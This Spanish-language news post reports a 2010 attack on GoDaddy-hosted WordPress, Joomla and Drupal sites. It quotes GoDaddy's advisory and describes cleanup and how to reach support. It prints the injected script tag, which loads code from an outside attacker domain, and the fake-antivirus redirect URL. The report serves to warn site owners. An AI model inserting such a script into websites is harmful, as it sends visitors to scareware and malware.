El 23 de diciembre de 2010 cientos de clientes del proveedor de hositng Godaddy con manejadores de contenido como: ordPress®, Joomla® y Drupal® han sido afectados, ya que sus bases de datos han sido modificadas, los hackers han agregado la siguiente línea a los sitios afectados: <script src=»http://acrossuniverseitbenet.com/js.php?kk=10″></script> la finalidad de este script es la de redireccionar hacia la página de un falso antivirus (http://www3.best-scan4u.com/?af5abb0958=%9B%EC%E0%97k%94%96%A5%ADS%E3%CC%C5%ABg%9B%A2%D7%DB%AA%C3%97e%95%C3%9Biohq%B0%9B).
Godaddy ha despleado un aviso de seguridad en su sitio web:
What’s happening: Attackers have injected a malicious script into individual customers’ databases. The script displays a warning that you have a virus, and offers to sell you antivirus software. Do not click any links on this window. Clicking the links installs malware on your computer. If you clicked on any of these links, you can uninstall the malware by using a free antivirus program, such as Microsoft® Security Essentials.
Cabe mencionar que eliminar el código malicioso no es tan fácil, una opción es hacerlo post por post o directamente desde la base de datos que es o que Godaddy está haciendo actualmente.
Si eres cliente de Godaddy y tienes este problema, deberás levantar un ticket de atención en Godaddy para que puedan solucionar el problema, puedes hacerlo en la siguiente dirección:
https://www.godaddy.com/community/contactus.aspx?section=support
